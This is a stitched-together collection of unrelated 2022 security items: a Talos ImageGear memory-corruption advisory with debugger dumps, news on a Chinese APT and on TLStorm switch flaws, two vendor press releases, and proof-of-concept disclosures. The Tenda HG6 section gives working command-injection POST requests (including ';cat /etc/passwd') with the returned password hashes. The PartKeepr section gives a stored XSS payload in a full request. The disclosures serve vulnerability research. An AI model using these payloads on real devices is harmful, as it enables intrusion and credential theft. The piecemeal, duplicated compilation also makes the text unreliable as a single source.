A memory corruption vulnerability exists in the ioca_mys_rgb_allocate functionality of Accusoft ImageGear 19.10. A specially-crafted malformed file can lead to an arbitrary free. An attacker can provide a malicious file to trigger this vulnerability.

**Summary**

A memory corruption vulnerability exists in the ioca\_mys\_rgb\_allocate functionality of Accusoft ImageGear 19.10. A specially-crafted malformed file can lead to an arbitrary free. An attacker can provide a malicious file to trigger this vulnerability.

**Tested Versions**

Accusoft ImageGear 19.10

**Product URLs**

ImageGear - https://www.accusoft.com/products/imagegear-collection/

**CVSSv3 Score**

9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-131 - Incorrect Calculation of Buffer Size

**Details**

The ImageGear library is a document-imaging developer toolkit that offers image conversion, creation, editing, annotation and more. It supports more than 100 formats such as DICOM, PDF, Microsoft Office and others.

Trying to load a malformed IOCA file, we end up with the following situation:

    (1bf4.175c): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    verifier_71920000!AVrfpDphFindBusyMemoryNoCheck+0xb8:
    71928758 813abbbbcdab    cmp     dword ptr [edx],0ABCDBBBBh ds:002b:d0d0d0a0=????????
    

When looking at the call stack, we can observe the crash is happening during the free process as detailed below:

    STACK_TEXT:  
    0019f310 71928875     04d71000 d0d0d0c0 00000000 verifier_71920000!AVrfpDphFindBusyMemoryNoCheck+0xb8
    0019f334 71928ae0     04d71000 d0d0d0c0 0019f3c4 verifier_71920000!AVrfpDphFindBusyMemory+0x15
    0019f350 7192aad0     04d71000 d0d0d0c0 04d70000 verifier_71920000!AVrfpDphFindBusyMemoryAndRemoveFromBusyList+0x20
    0019f36c 7739f966     04d70000 01000002 d0d0d0c0 verifier_71920000!AVrfDebugPageHeapFree+0x90
    0019f3d4 77303d46     d0d0d0c0 3b0d5201 00000000 ntdll_772c0000!RtlDebugFreeHeap+0x3e
    0019f530 7734791d     00000000 d0d0d0c0 d0d0d0c0 ntdll_772c0000!RtlpFreeHeap+0xd6
    0019f58c 77303c16     00000000 00000000 00000000 ntdll_772c0000!RtlpFreeHeapInternal+0x783
    0019f5ac 7146dac2     04d70000 00000000 d0d0d0c0 ntdll_772c0000!RtlFreeHeap+0x46
    0019f5c0 71606b22     d0d0d0c0 00000000 09b60fa8 MSVCR110!free+0x1a
    0019f5d4 715ed0a3     00000000 0bd49ff0 98cbb32c igCore19d!IG_comm_is_comp_exist+0x4ad2
    0019f608 7164d641     0f83cfe0 00000000 0d0c4ff0 igCore19d!GPb_image_associate+0xd33
    0019f62c 7162a14e     0019fdb0 0b44aff8 00000000 igCore19d!IG_mpi_page_set+0x11611
    0019f64c 716dc57d     0019fc3c 0b44aff8 00000000 igCore19d!IG_cpm_profiles_reset+0xf03e
    0019f674 716e271b     0019fc3c 1000001f 1271f000 igCore19d!IG_mpi_page_set+0xa054d
    0019f708 716e0cc0     0019fc3c 1000001f 0afa2ff8 igCore19d!IG_mpi_page_set+0xa66eb
    0019fbb4 716113d9     0019fc3c 0afa2ff8 00000001 igCore19d!IG_mpi_page_set+0xa4c90
    0019fbec 716508d7     00000000 0afa2ff8 0019fc3c igCore19d!IG_image_savelist_get+0xb29
    0019fe68 71650239     00000000 0019ff10 00000001 igCore19d!IG_mpi_page_set+0x148a7
    0019fe88 715e5757     00000000 0019ff10 00000001 igCore19d!IG_mpi_page_set+0x14209
    0019fea8 00402219     0019ff10 0019febc 00000001 igCore19d!IG_load_file+0x47
    0019fec0 00402524     0019ff10 0019fef8 052e2f48 Fuzzme!fuzzme+0x19
    0019ff28 0040668d     00000005 052dcf78 052e2f48 Fuzzme!fuzzme+0x324
    0019ff70 7514fa29     00353000 7514fa10 0019ffdc Fuzzme!fuzzme+0x448d
    0019ff80 77327a9e     00353000 3b0d58ed 00000000 KERNEL32!BaseThreadInitThunk+0x19
    0019ffdc 77327a6e     ffffffff 77348a68 00000000 ntdll_772c0000!__RtlUserThreadStart+0x2f
    0019ffec 00000000     00406715 00353000 00000000 ntdll_772c0000!_RtlUserThreadStart+0x1b
    

Inspecting the argument indicates the parameter to free() is not a valid address: 0xd0d0d0c0.  
Tracing back through the call stack leads us to the function IGDIBRunEnds::delete_table_mys_rbg_ptr with the following pseudo code:

    LINE1  void __thiscall IGDIBRunEnds::delete_table_mys_rbg_ptr(IGDIBRunEnds *this,int pixpos,int some_buffer)
    LINE2  {
    LINE3    if (this->mys_RGB != (mys_RGB *)this->table_mys_rgb[pixpos]) {
    LINE4       operator_delete((mys_RGB *)this->table_mys_rgb[pixpos]);
    LINE5    }
    LINE6    if (some_buffer == 0) {
    LINE7       some_buffer = (int)this->mys_RGB;
    LINE8    }
    LINE9    this->table_mys_rgb[pixpos] = some_buffer;
    LINE10   this->field_0x48 = 1;
    LINE11   return;
    LINE12 }
    

The free is corresponding to the operator_delete called in LINE4, which is indexed by pixpos to delete a specific element.

When looking at how this is constructed, the table_mys_rgb object in this case lands in the following code:

    LINE13 void __thiscall IGDIBRunEnds::FUN_743f6aa0(IGDIBRunEnds *this)
    LINE14 {  
    LINE15   if (this->table_mys_rgb == (dword *)0x0) {
    LINE16     size_to_allocate = this->size_Y * 4;
    LINE17     buffer = (dword *)operator_new(-(uint)((int)(size_to_allocate >> 0x20) != 0) |
    LINE18                                    (uint)size_to_allocate);
    LINE19     if (this->table_mys_rgb != buffer) {
    LINE20       operator_delete(this->table_mys_rgb);
    LINE21       this->table_mys_rgb = buffer;
    LINE22     }
    LINE23     size_y = this->size_Y;
    LINE24     while (size_y != 0) {
    LINE25       size_y = size_y - 1;
    LINE26       this->table_mys_rgb[size_y] = (dword)this->mys_RGB;
    LINE27     }
    LINE28   }
    LINE29   return;
    LINE30 }
    

So we can see the allocation in LINE17, followed by a while loop between LINE24 and LINE27 to fill the memory allocated. Now the issue is happening when size_Y read from the file is null, thus the allocation of buffer becomes uncontrolled and a zero byte allocation is made in LINE17, returned by a malloc null operation. Thus the while loop (LINE24) is not processed and the flow continues without initializing any element in table_mys_rgb. When the thread reaches the function IGDIBRunEnds::delete_table_mys_rbg_ptr, even with a null pixpos value, the pointer at table_mys_rgb[0] (which is not initialized, since table_mys_rgb has a size of 0) is freed via operator_delete, possibly leading to an arbitrary free.

**Crash Information**

    0:000:x86> !analyze -v
    *******************************************************************************
    *                                                                             *
    *                        Exception Analysis                                   *
    *                                                                             *
    *******************************************************************************
    
    
    KEY_VALUES_STRING: 1
    
        Key  : AV.Fault
        Value: Read
    
        Key  : Analysis.CPU.mSec
        Value: 1905
    
        Key  : Analysis.DebugAnalysisManager
        Value: Create
    
        Key  : Analysis.Elapsed.mSec
        Value: 34355
    
        Key  : Analysis.Init.CPU.mSec
        Value: 5030
    
        Key  : Analysis.Init.Elapsed.mSec
        Value: 119236
    
        Key  : Analysis.Memory.CommitPeak.Mb
        Value: 123
    
        Key  : Timeline.OS.Boot.DeltaSec
        Value: 1162
    
        Key  : Timeline.Process.Start.DeltaSec
        Value: 84
    
        Key  : WER.OS.Branch
        Value: vb_release
    
        Key  : WER.OS.Timestamp
        Value: 2019-12-06T14:06:00Z
    
        Key  : WER.OS.Version
        Value: 10.0.19041.1
    
        Key  : WER.Process.Version
        Value: 1.0.1.1
    
    
    NTGLOBALFLAG:  2000000
    
    PROCESS_BAM_CURRENT_THROTTLED: 0
    
    PROCESS_BAM_PREVIOUS_THROTTLED: 0
    
    APPLICATION_VERIFIER_FLAGS:  0
    
    APPLICATION_VERIFIER_LOADED: 1
    
    EXCEPTION_RECORD:  (.exr -1)
    ExceptionAddress: 71928758 (verifier_71920000!AVrfpDphFindBusyMemoryNoCheck+0x000000b8)
       ExceptionCode: c0000005 (Access violation)
      ExceptionFlags: 00000000
    NumberParameters: 2
       Parameter[0]: 00000000
       Parameter[1]: d0d0d0a0
    Attempt to read from address d0d0d0a0
    
    FAULTING_THREAD:  0000175c
    
    PROCESS_NAME:  Fuzzme.exe
    
    READ_ADDRESS:  d0d0d0a0 
    
    ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
    
    EXCEPTION_CODE_STR:  c0000005
    
    EXCEPTION_PARAMETER1:  00000000
    
    EXCEPTION_PARAMETER2:  d0d0d0a0
    
    STACK_TEXT:  
    0019f310 71928875     04d71000 d0d0d0c0 00000000 verifier_71920000!AVrfpDphFindBusyMemoryNoCheck+0xb8
    0019f334 71928ae0     04d71000 d0d0d0c0 0019f3c4 verifier_71920000!AVrfpDphFindBusyMemory+0x15
    0019f350 7192aad0     04d71000 d0d0d0c0 04d70000 verifier_71920000!AVrfpDphFindBusyMemoryAndRemoveFromBusyList+0x20
    0019f36c 7739f966     04d70000 01000002 d0d0d0c0 verifier_71920000!AVrfDebugPageHeapFree+0x90
    0019f3d4 77303d46     d0d0d0c0 3b0d5201 00000000 ntdll_772c0000!RtlDebugFreeHeap+0x3e
    0019f530 7734791d     00000000 d0d0d0c0 d0d0d0c0 ntdll_772c0000!RtlpFreeHeap+0xd6
    0019f58c 77303c16     00000000 00000000 00000000 ntdll_772c0000!RtlpFreeHeapInternal+0x783
    0019f5ac 7146dac2     04d70000 00000000 d0d0d0c0 ntdll_772c0000!RtlFreeHeap+0x46
    0019f5c0 71606b22     d0d0d0c0 00000000 09b60fa8 MSVCR110!free+0x1a
    WARNING: Stack unwind information not available. Following frames may be wrong.
    0019f5d4 715ed0a3     00000000 0bd49ff0 98cbb32c igCore19d!IG_comm_is_comp_exist+0x4ad2
    0019f608 7164d641     0f83cfe0 00000000 0d0c4ff0 igCore19d!GPb_image_associate+0xd33
    0019f62c 7162a14e     0019fdb0 0b44aff8 00000000 igCore19d!IG_mpi_page_set+0x11611
    0019f64c 716dc57d     0019fc3c 0b44aff8 00000000 igCore19d!IG_cpm_profiles_reset+0xf03e
    0019f674 716e271b     0019fc3c 1000001f 1271f000 igCore19d!IG_mpi_page_set+0xa054d
    0019f708 716e0cc0     0019fc3c 1000001f 0afa2ff8 igCore19d!IG_mpi_page_set+0xa66eb
    0019fbb4 716113d9     0019fc3c 0afa2ff8 00000001 igCore19d!IG_mpi_page_set+0xa4c90
    0019fbec 716508d7     00000000 0afa2ff8 0019fc3c igCore19d!IG_image_savelist_get+0xb29
    0019fe68 71650239     00000000 0019ff10 00000001 igCore19d!IG_mpi_page_set+0x148a7
    0019fe88 715e5757     00000000 0019ff10 00000001 igCore19d!IG_mpi_page_set+0x14209
    0019fea8 00402219     0019ff10 0019febc 00000001 igCore19d!IG_load_file+0x47
    0019fec0 00402524     0019ff10 0019fef8 052e2f48 Fuzzme!fuzzme+0x19
    0019ff28 0040668d     00000005 052dcf78 052e2f48 Fuzzme!fuzzme+0x324
    0019ff70 7514fa29     00353000 7514fa10 0019ffdc Fuzzme!fuzzme+0x448d
    0019ff80 77327a9e     00353000 3b0d58ed 00000000 KERNEL32!BaseThreadInitThunk+0x19
    0019ffdc 77327a6e     ffffffff 77348a68 00000000 ntdll_772c0000!__RtlUserThreadStart+0x2f
    0019ffec 00000000     00406715 00353000 00000000 ntdll_772c0000!_RtlUserThreadStart+0x1b
    
    
    STACK_COMMAND:  ~0s ; .cxr ; kb
    
    SYMBOL_NAME:  verifier_71920000!AVrfpDphFindBusyMemoryNoCheck+b8
    
    MODULE_NAME: verifier_71920000
    
    IMAGE_NAME:  verifier.dll
    
    FAILURE_BUCKET_ID:  INVALID_POINTER_READ_AVRF_c0000005_verifier.dll!AVrfpDphFindBusyMemoryNoCheck
    
    OS_VERSION:  10.0.19041.1
    
    BUILDLAB_STR:  vb_release
    
    OSPLATFORM_TYPE:  x64
    
    OSNAME:  Windows 10
    
    IMAGE_VERSION:  10.0.19041.1
    
    FAILURE_ID_HASH:  {bd57151c-e59f-3c94-75ca-6923d50e6d0d}
    
    Followup:     MachineOwner
    ---------
    

**Vendor Response**

Documentation Windows: http://help.accusoft.com/ImageGear/v20.0/Windows/DLL/webframe.html Linux: http://help.accusoft.com/ImageGear/v20.0/Linux/webframe.html

Download Links Windows: https://download.accusoft.com/imagegear/pro/ImageGear\_for\_C\_and\_CPP\_v20.0.exe Linux: https://download.accusoft.com/imagegear/pro/unix/ImageGear\_for\_C\_Cpp20.0.0-Linux64.tar.gz

https://download.accusoft.com/imagegear/pro/ImageGear\_for\_C\_and\_CPP\_v20.0.exe

**Timeline**

2022-01-26 - Vendor disclosure  
2022-04-29 - Vendor Patched  
2022-05-02 - Public Release  

Discovered by Emmanuel Tacheau of Cisco Talos.

CVE-2022-22137: TALOS-2022-1449 || Cisco Talos Intelligence Group

Chinese state-sponsored actors have been caught red-handed trying to extract intelligence from Russians via a guard camp close to their border.
The post State-backed hacking group from China is targeting the Russian military appeared first on Malwarebytes Labs.

In an unexpected turn of events, research has surfaced about a Chinese APT (advanced persistent threat) group targeting the Russian military in recent cyberattacks.

Tracked as Bronze President, Mustang Panda, RedDelta, and TA416, the group has focused mainly on Southeast Asian targets—and more recently, European diplomats—and turned their attention towards Russia and started targeting the country’s military situated close to the Chinese border.

Dell SecureWorks retrieved a file named _Blagoveshchensk – Blagoveshchensk Border Detachment_, which bears the icon of a PDF file but is actually an executable file.

From the report:

> “Blagoveshchensk is a Russian city close to the China border and is home to the 56th Blagoveshchenskiy Red Banner Border Guard Detachment. This connection suggests that the filename was chosen to target officials or military personnel familiar with the region.”

Once the supposed document is “opened,” the executable downloads four files, including a clean document file used as a decoy (screenshot below), from a server Mustang Panda is known to use.

_Although the file name is aimed at Russian recipients, it throws one off when they see the decoy document written in English. (Source: Dell SecureWorks)_

The document appears like a formal report from the European Commission, and it details the refugee and migrant status pressuring countries bordering Belarus.

The three additional files are required for Mustang Panda to use DLL search order hijacking to install a variant of PlugX, an old remote access tool (RAT), onto target systems. This allows threat actors to secretly load a malicious DLL, thus avoiding detection from security solutions software.

PlugX is capable of stealing sensitive information from target machines. Although this, as a whole, is a benign attack that involves intelligence gathering, it is interesting to note the shifting targets, presumably based on the political situation in Europe and what’s happening in Ukraine. Suffice to say, China continues to look out for itself and its interests, even if it involves countries it considers “strategic partners of coordination”.

State-backed hacking group from China is targeting the Russian military

Tenda HG6 version 3.3.0 suffers from a remote command injection vulnerability. It can be exploited to inject and execute arbitrary shell commands through the pingAddr and traceAddr HTTP POST parameters in formPing, formPing6, formTracert and formTracert6 interfaces.

  
Tenda HG6 v3.3.0 Remote Command Injection Vulnerability

Vendor: Tenda Technology Co.,Ltd.  
Product web page: https://www.tendacn.com  
                  https://www.tendacn.com/product/HG6.html  
Affected version: Firmware version: 3.3.0-210926  
                  Software version: v1.1.0  
                  Hardware Version: v1.0  
                  Check Version: TD_HG6_XPON_TDE_ISP

Summary: HG6 is an intelligent routing passive optical network  
terminal in Tenda FTTH solution. HG6 provides 4 LAN ports(1*GE,3*FE),  
a voice port to meet users' requirements for enjoying the Internet,  
HD IPTV and VoIP multi-service applications.

Desc: The application suffers from an authenticated OS command injection  
vulnerability. This can be exploited to inject and execute arbitrary  
shell commands through the 'pingAddr' and 'traceAddr' HTTP POST parameters  
in formPing, formPing6, formTracert and formTracert6 interfaces.

Tested on: Boa/0.93.15

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2022-5706  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5706.php

22.04.2022

--

ping.asp:  
---------

POST /boaform/formPing HTTP/1.1  
Host: 192.168.1.1

pingAddr=;ls /etc&wanif=65535&submit-url=/ping.asp&postSecurityFlag=2564

---  
TZ  
app.gwdt  
bftpd.conf  
buildtime  
check_version.txt  
config  
config.csv  
config_default.xml  
config_default_hs.xml  
dhclient-script  
dnsmasq.conf  
ethertypes  
factory_default.xml  
ftpdpassword  
group  
hardversion  
inetd.conf  
init.d  
inittab  
innversion  
insdrv.sh  
irf  
mdev.conf  
omci_custom_opt.conf  
omci_ignore_mib_tbl.conf  
omci_ignore_mib_tbl_10g.conf  
omci_mib.cfg  
orf  
passwd  
ppp  
profile  
protocols  
radvd.conf  
ramfs.img  
rc_boot_dsp  
rc_voip  
release_date  
resolv.conf  
rtk_tr142.sh  
run_customized_sdk.sh  
runoam.sh  
runomci.sh  
runsdk.sh  
samba  
scripts  
services  
setprmt_reject  
shells  
simplecfgservice.xml  
smb.conf  
softversion  
solar.conf  
solar.conf.in  
ssl_cert.pem  
ssl_key.pem  
version  
wscd.conf

ping6.asp:  
----------

POST /boaform/formPing6 HTTP/1.1  
Host: 192.168.1.1

pingAddr=;ls&wanif=65535&go=Go&submit-url=/ping6.asp

---  
boa.conf  
web

tracert.asp:  
------------

POST /boaform/formTracert HTTP/1.1  
Host: 192.168.1.1

traceAddr=;pwd&trys=1&timeout=5&datasize=38&dscp=0&maxhop=10&go=Go&submit-url=/tracert.asp

---  
/home/httpd

tracert6.asp:  
-------------

POST /boaform/formTracert6 HTTP/1.1  
Host: 192.168.1.1

traceAddr=;cat /etc/passwd&trys=1&timeout=5&datasize=38&maxhop=10&go=Go&submit-url=/tracert6.asp

---  
admin:$1$$CoERg7ynjYLsj2j4glJ34.:0:0::/tmp:/bin/sh  
adsl:$1$$m9g7v7tSyWPyjvelclu6D1:0:0::/tmp:/bin/sh  
nobody:x:0:0::/tmp:/dev/null  
user:$1$$ex9cQFo.PV11eSLXJFZuj.:1:0::/tmp:/bin/sh

Tenda HG6 3.3.0 Remote Command Injection

Tiger Global Management invests $35 million in SkyHawk Security to accelerate growth.

**TEL AVIV, Israel, May 3, 2022—** Radware® (NASDAQ: RDWR), a leading provider of cyber security and application delivery solutions, today announced the spinoff of its Cloud Native Protector (CNP) business to form a new company called SkyHawk Security. To accelerate

SkyHawk Security’s development and growth opportunities, an affiliate of Tiger Global

Management will make a $35 million strategic external investment, resulting in a valuation of $180 million. Tiger Global Management is a leading global technology investment firm focused on private and public companies in the internet, software, and financial technology sectors.

Skyhawk Security is a leader in cloud threat detection and protects dozens of the world’s leading organizations using its artificial intelligence and machine learning technologies. Its Cloud Native Protector provides comprehensive protection for workloads and applications hosted in public cloud environments. It uses a multi-layered approach that covers the overall security posture of the cloud and threats to individual workloads. Easy-to-deploy, the agentless solution identifies and prevents compliance violations, cloud security misconfigurations, excessive permissions, and malicious activity in the cloud.

“We recognize the growing opportunities in the public cloud security market and are planning to capitalize on them,” said Roy Zisapel, Radware’s president and CEO. “We look forward to partnering with Tiger Global Management to scale the business, unlock even more security value for customers, and position SkyHawk Security for long-term success.”

The spinoff, which adds to Radware’s recently announced strategic cloud services initiative, further demonstrates the company’s ongoing commitment to innovation. SkyHawk Security will have the ability to operate with even greater sales, marketing, and product focus as well as speed and flexibility. Current and new CNP customers will benefit from future product development efforts, while CNP services for existing customers will continue without interruption.

Radware does not expect the deal to materially affect operating results for the second quarter or full year of 2022.

**About Tiger Global Management**

Tiger Global Management is a leading global technology investment firm that focuses on private and public companies in the software, internet, and financial technology sectors. Since 2001, Tiger Global has invested in hundreds of companies across more than 30 countries, including investments ranging from Series A to pre-IPO. The firm aims to partner with dynamic entrepreneurs operating market-leading companies in its core focus areas.

**About Radware**

Radware® (NASDAQ: RDWR) is a global leader of cyber security and application delivery solutions for physical, cloud, and software defined data centers. Its award-winning solutions portfolio secures the digital experience by providing infrastructure, application, and corporate IT protection, and availability services to enterprises globally. Radware’s solutions empower enterprise and carrier customers worldwide to adapt to market challenges quickly, maintain business continuity, and achieve maximum productivity while keeping costs down. For more information, please visit the Radware website.

Radware encourages you to join our community and follow us on: Facebook, LinkedIn, Radware Blog, Twitter, YouTube, and Radware Mobile for iOS and Android.

©2022 Radware Ltd. All rights reserved. Any Radware products and solutions mentioned in this press release are protected by trademarks, patents, and pending patent applications of Radware in the U.S. and other countries. For more details, please

see: https://www.radware.com/LegalNotice/. All other trademarks and names are property of their respective owners.

Radware believes the information in this document is accurate in all material respects as of its publication date. However, the information is provided without any express, statutory, or implied warranties and is subject to change without notice.

The contents of any website or hyperlinks mentioned in this press release are for informational purposes and the contents thereof are not part of this press release.

Radware Launches SkyHawk Security, a Spinoff of Its  Cloud Native Protector Business

Providing continuous penetration testing with context, and a host of other features, the Incenter platform is built to give organizations what they need to effectively secure their environment.

**NEW YORK, NY, May 3, 2022 -** OccamSec, a leading cybersecurity provider, announced today the launch of their Incenter platform. Incenter identifies the security weaknesses an organization has in real-time, and helps teams develop insights and communicate business context from a security perspective.

For today’s organizations, the threat landscape is constantly evolving. Penetration testing and vulnerability scanning can help, but with new vulnerabilities and exploits found all the time, infrequent testing means risk data may be outdated. At the same time the industry is trending towards slicing the solution ever thinner, which means costs keep increasing.

Incenter combines the functionality of a range of security services in one single solution. The platform provides, in real time, where an organization is vulnerable, and just as critically, what the impact will be if an attack occurs.

Incenter utilizes a dual approach. It combines the best in technology with advanced automated testing, and the best in people with OccamSec’s security team. Supported by vulnerability research and a threat intelligence team, the burden on clients having to buy multiple services is eliminated.

Users have the ability to generate reports that compile real-time information with the touch of a button, rather than waiting for a timed report to be generated. Incenter also provides step-by-step guidance on how to mitigate any risks that are identified, with the tools an organization already has which means no hidden costs.

Incenter combines the functionality of a range of security services in one single solution:

*   Manual Penetration Testing
*   Penetration Testing as a Service (PTaaS)
*   Automated Security Validation (ASV)
*   Vulnerability Scanning
*   External Attack Surface Management (EASM)
*   Crowd Source Penetration Testing
*   Threat Intelligence

This provides a single source of truth on the exposures an organization faces. Improving the effectiveness of any security team, regardless of size, and at the same time breaking organizations out of ever increasing cyber security expenditure.

The platform's focus on the unique business context of each organization means that security teams no longer have to trudge through 1000’s of scan findings or determine how relevant a penetration test finding is and how to fix it. At the same time from the dashboard, management can see a high level summary of their organization's exposure, the likelihood of a breach, and how much it’s going to cost them.

“Over the years we have seen what works, what doesn’t and where the gaps are,” says OccamSec founder Mark Stamford. “The biggest gap is organizations needing more and more tools and services to effectively secure themselves. The key to effective security is joining the dots, not having ever more dots scattered in ever more places. With Incenter we have combined the talents of our security team and their expert knowledge, with a technical solution that is unrivaled. The result is a win for our clients, regardless of size.”

Incenter is now available. For more information, visit: www.occamsec.com/incenter

**About OccamSec**

OccamSec is a leading provider in the world of cybersecurity. Its clients rely on them to provide information security services that exceed current industry standards. OccamSec provides accurate, actionable information to reduce risk and enable better informed decisions. Its unique end-to-end solutions detect, identify, respond, and protect in order to maximize the effectiveness of security programs.

OccamSec’s methodology is the result of years of experience in the field, providing real business outcomes. Its team has performed security assessments at some of the world’s largest companies, including financial services and technology. They bring this experience to each and every project, ensuring that their clients get the best service in the industry.

OccamSec Unveils New Cybersecurity Platform

The application suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'pingAddr' and 'traceAddr' HTTP POST parameters in formPing, formPing6, formTracert and formTracert6 interfaces.

Title: Tenda HG6 v3.3.0 Remote Command Injection Vulnerability  
Advisory ID: ZSL-2022-5706  
Type: Local/Remote  
Impact: System Access, DoS  
Risk: (4/5)  
Release Date: 03.05.2022

**Summary**

HG6 is an intelligent routing passive optical network terminal in Tenda FTTH solution. HG6 provides 4 LAN ports(1\*GE,3\*FE), a voice port to meet users' requirements for enjoying the Internet, HD IPTV and VoIP multi-service applications.

**Description**

The application suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'pingAddr' and 'traceAddr' HTTP POST parameters in formPing, formPing6, formTracert and formTracert6 interfaces.

**Vendor**

Tenda Technology Co.,Ltd. - https://www.tendacn.com

**Affected Version**

Firmware version: 3.3.0-210926  
Software version: v1.1.0  
Hardware Version: v1.0  
Check Version: TD\_HG6\_XPON\_TDE\_ISP

**Tested On**

Boa/0.93.15

**Vendor Status**

\[22.04.2022\] Vulnerability discovered.  
\[26.04.2022\] Vendor contacted.  
\[01.05.2022\] No response from the vendor.  
\[03.05.2022\] Public security advisory released.

**PoC**

tenda\_hg6\_cmdinj.txt

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

N/A

**Changelog**

\[03.05.2022\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

Tenda HG6 v3.3.0 Remote Command Injection Vulnerability

Stored XSS in PartKeepr 1.4.0 Edit section in multiple api endpoints via name parameter.

**Description**

Stored XSS in PartKeepr 1.4.0 Edit section in multiple api endpoints via name parameter

**Reproduction Steps**

Browsing to Edit tab, select project and add new project.  
There, insert the following payload <img src=x onerror=alert(1)> in name field.

The request performed is the following, being name the vulnerable parameter :

    POST /api/projects HTTP/1.1
    Host: partkeepr.vuln
    Cookie: PHPSESSID=fju4llfcogfr2q9ug1bl982117
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Authorization: Basic YWRtaW46YWRtaW4=
    Content-Type: application/json
    X-Requested-With: XMLHttpRequest
    Content-Length: 303
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Te: trailers
    Connection: close
    
    {"name":"<img src=x onerror=alert(1)>","description":"","projectPartKeeprProjectBundleEntityProjectAttachments":[],"attachments":[],"projectPartKeeprProjectBundleEntityProjectParts":[],"parts":[],"projectPartKeeprProjectBundleEntityProjectRuns":[],"projectPartKeeprProjectBundleEntityReportProjects":[]}
    

Then, when another user goes to edit tab and clicks the project with the payload as name, XSS triggers

Apart from **projects** , the following tabs are also vulnerable : **footprints**,**manufacturers**,**storage locations**, **distributors**, **part measurement units** , **units** and **batch jobs**

**System Information**

*   PartKeepr Version: 1.4.0
*   Operating System: LInux
*   Web Server: Apache
*   PHP Version: 7.4
*   Database and version: Mysql
*   Reproducible on the demo system: Yes

CVE-2021-39390: Stored XSS in PartKeepr · Issue #1237 · partkeepr/PartKeepr

In the latest incarnation of the TLStorm vulnerability, switches from Avaya and Aruba — and perhaps others — are susceptible to compromise from an internal attacker.

Network switches from Aruba and Avaya are vulnerable to multiple flaws that could allow attackers to remotely execute code and completely take over the devices.

Researchers from device-intelligence firm Armis found five vulnerabilities — two flaws in Aruba switches and three flaws in Avaya switches — that could be used to compromise networks that allow some outsider access, even with limited rights. The flaws can be exploited by a user of a captive portal or authentication server, researchers explained.

Worryingly, in looking at the details of the bugs, the three Avaya bugs are zero-click, requiring no authentication or user interaction to exploit. One of them affects an end-of-life device and won't be receiving a patch.

Three of the vulnerabilities originate with improper handling of errors produced by a third-party library for implementing TLS produced by Internet of Things (IoT) cybersecurity firm Mocana.

Because switches are typically not Internet-facing, the vulnerabilities face less danger from external hackers, but the risk is still significant, says Barak Hadad, head of research for Armis.

"These are major issues, because switches act as the gatekeepers when we talk about segmentation," he says. "When you gain control over switches, any segmentation of the network becomes invalid."

The vulnerability details are as follows:

Aruba:

*   CVE-2022-23677 (9.0 CVSS score) — NanoSSL misuse on multiple interfaces (RCE)\*
*   CVE-2022-23676 (9.1 CVSS score) — RADIUS client memory corruption vulnerabilities

Avaya:

*   CVE-2022-29860 (CVSS 9.8) — TLS reassembly heap overflow\*
*   CVE-2022-29861 (CVSS 9.8) — HTTP header parsing stack overflow
*   HTTP POST request handling heap overflow (no CVE because it is in an older version)\*

\* These are caused by the interaction between Mocana NanoSSL and the products.

**Software Supply-Chain Woes Persist**  
The vulnerabilities underscore the risks of the software supply chain and the potential dangers that come with using third-party components. Security flaws in the libraries on which software depends — or in this case, in the way that the software and library interact — can create or propagate vulnerabilities. On average, 78% of software codebases consist of open source components and libraries.

In March, researchers discovered a similar set of flaws that caused security vulnerabilities in more than 150 IoT products, also caused by another third-party component.

"While the use of external libraries has many advantages, it also brings inherent uncertainty," Armis stated in its security advisory published on May 3. "Implanting a 'foreign' code means the vendor is trusting it to be implemented safely, since any security issues originating in the external library are embedded within it, and automatically become security issues which the vendor has less control over."

**TLStorm, Part 2**  
At the heart of the Mocana-related vulnerabilities are unstable error states in the Mocana NanoSSL library that handles transport layer security (TLS) for the products' management interface.

The issues occur because the attacker can craft network packets that cause errors in the Mocana NanoSSL library, and developers producing software for vendors do not handle the errors properly.

The result are two classes of vulnerabilities: memory corruption and state confusion.

"If you start a TLS handshake and the other side sends an improper message, if you don't check the error code correctly, that scenario can be leveraged to gain remote code execution in some cases," Armis' Hadad says. "The manual clearly says that the developer should check the error, but as we know, it's not common for developers to read through the entire manual."

Armis has worked with Mocana, Aruba, and Avaya to remediate the issues where appropriate. The companies' customers have been notified, and each company has released updated software. In Mocana's case, even though the vulnerabilities are not technically caused by the software, the company has created an update anyway to avoid future flawed implementations.

"It is not a Mocana vulnerability, but nonetheless, they have published new software that makes it so you are not in a vulnerable situation just because you did not check the error code," Hadad says.

The vulnerabilities, dubbed TLStorm 2.0 by Armis, are similar to ones announced in March that affect smart-connected uninterruptible power supplies (UPS).

**Not the First Flawed implementation**  
Previously, Armis researchers showed the same vulnerabilities used against several models of UPS from APC, now owned by Schneider Electric. The attacks, which targeted UPS that connected to the Schneider Electric Cloud to enable management, could allow attackers to remotely compromise devices without any user interaction or leaving any trace of the attack.

Because new firmware could be loaded into the devices remotely, attackers could change the waveform and voltage of the AC power provided to connected devices and even cause the UPS to overheat.

"The fact that UPS devices regulate high voltage power, combined with their Internet connectivity — makes them a high-value cyber-physical target," Armis stated in its March advisory regarding the vulnerabilities, which it called TLStorm. "Since the TLS attack vector can originate from the Internet, these vulnerabilities can act as a gateway to the internal corporate network. Bad actors can use the TLS state confusion to identify themselves as the Schneider Electric cloud and collect information about the UPS behind the corporate firewall."

TLS Flaws Leave Avaya, Aruba Switches Open to Complete Takeover

A Chinese-aligned cyberespionage group has been observed striking the telecommunication sector in Central Asia with versions of malware such as ShadowPad and PlugX.
